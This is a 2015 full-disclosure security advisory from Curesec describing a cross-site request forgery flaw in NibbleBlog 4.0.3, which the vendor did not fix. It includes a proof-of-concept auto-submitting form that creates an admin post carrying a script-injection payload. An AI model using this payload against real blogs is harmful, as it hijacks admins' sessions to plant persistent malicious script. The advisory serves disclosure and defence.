NibbleBlog 4.0.3 Cross Site Request Forgery
Posted on 04 September 2015
NibbleBlog 4.0.3: CSRF Security Advisory – Curesec Research Team 1. Introduction Affected Product: NibbleBlog 4.0.3 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: Website: http://www.nibbleblog.com/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 07/21/2015 Disclosed to public: 09/01/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description NibbleBlog 4.0.3 does not have CSRF protection. This means that an attacker can perform actions for an admin if the admin is logged in and visits an attacker controlled website. In the case of NibbleBlog, this can for example lead to persistent XSS via the creation of a new post, which in turn allows for phishing attacks or the injection of JavaScript keyloggers. 3. Proof of Concept Create new Post (for Spam and XSS): <form id="myForm" action="http://localhost/nibbleblog/admin.php?controller=post&action=new_simple" method="POST"> <input name="title" value="Interesting!"> <input name="content" value="visit <a href='http://example.com'>this</a>.<img src='no' onerror='alert(1)'>"> <input name="allow_comments" value="1"> <input name="id_cat" value="0"> </form> <script> document.getElementById("myForm").submit(); </script> 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 07/21/2015 Informed Vendor about Issue 07/22/2015 Vendor Replied 08/18/2015 Reminded Vendor of release date (no reply) 09/01/2015 Disclosed to public 6. Blog Reference http://blog.curesec.com/article/blog/NibbleBlog-403-CSRF-46.html